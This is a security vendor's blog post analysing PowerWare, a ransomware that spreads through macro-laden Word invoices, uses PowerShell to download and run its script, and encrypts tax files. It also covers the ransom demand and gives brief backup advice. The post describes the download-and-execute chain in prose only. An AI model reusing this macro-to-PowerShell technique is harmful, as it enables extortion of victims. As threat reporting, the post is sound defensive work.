Tax Day Extortion: PowerWare Crypto-ransomware Targets Tax Files

As we are certain about some aspects of life, the same can be said about cybercrime. Tax Day draws closer in the U.S., and as millions of Americans are in the process of filing their taxes, cybercriminals are also stepping in to make this task profitable for them and difficult for their victims. We have seen recent incidents of organizations falling for business email compromise (BEC) schemes related to tax filing; now, it looks like online extortionists have joined the fray as well.

PowerWare (detected by Trend Micro as RANSOM_POWERWARE.A) is a new crypto-ransomware that abuses Windows PowerShell for its infection routine. However, apart from encrypting files commonly targeted by ransomware, PowerWare also targets tax return files created by tax filing programs (for example, files with .tax2013 and .tax2014 extensions). For users and organizations, losing current and previous years’ records can be a hassle, sometimes costly; in the U.S., for example, it is recommended that taxpayers keep the records of their tax returns for about of three (3) years after filing them because the statute of limitations for assessment of taxes and refunds runs for that same time period.

It is also worth noting that while ransomware that target specific tax-related files havebeenseen before, PowerWare’s technique using macro and PowerShell is quite uncommon.

Figure 1. Spam confuses users with “Invoice” as subject and “Financial Manager” as the sender

The infection starts when targets open a Microsoft Word document with an embedded malicious macro. This document is spread via emails, which is a common way to deliver crypto-ransomware.

The document instructs the victim to enable the macros. Once they are enabled, the malicious macro executes the following codes:

Figure 2. Word document instructing users to enabled macros

Figure 3. Snippet of the code that calls Powershell

As seen in the codes above, the macro uses cmd to execute an instance of Powershell.exe. This instance then connects to a website to download the PowerWare ransomware script (also written in Powershell) and save it as in the Windows Temporary folder as Y.ps1. The code then executes another Powershell instance to run PowerWare.

As mentioned earlier, PowerWare encrypts .tax2013 and .tax2014 extension files, among others, before self-destructing. It also drops an HTML file named “FILES_ENCRYPTED-READ_ME.HTML” in each folder with an encrypted file, detailing how an affected user can get their files back.

The attackers demand US$500 or 1.188 BTC and double that if the victim fails to pay before their deadline.

Figure 4. HTML page explaining the situation to the victim

Figure 5. Ransomware payment procedures

Figure 6. Ransom payment confirmation

Although PowerWare is a new family of crypto-ransomware, it mimics CryptoWall to a certain extent. It uses the same ransom note design as CryptoWall’s, and upon accessing the payment site, one can also observe the title bar bearing “CryptoWall Decript Service.” In a way, PowerWare wants the same impact as CryptoWall once had.

PowerWare also has the ability to enumerate all logical drives, including drives mapped to shared networks, making it a major threat to big companies with little or no experience in handling threats such as crypto-ransomware.

How to be ransomware-free this tax season

Knowledge of such threats serves as a user’s front line defense versus ransomware. Creating sufficient and regularly scheduled backups also help mitigate damage by ransomware. We also encourage users to implement the 3-2-1 rule for backing up their files:

Security Predictions for 2020

Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.Read our security predictions for 2020.

Business Process Compromise

Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more,
read our Security 101: Business Process Compromise.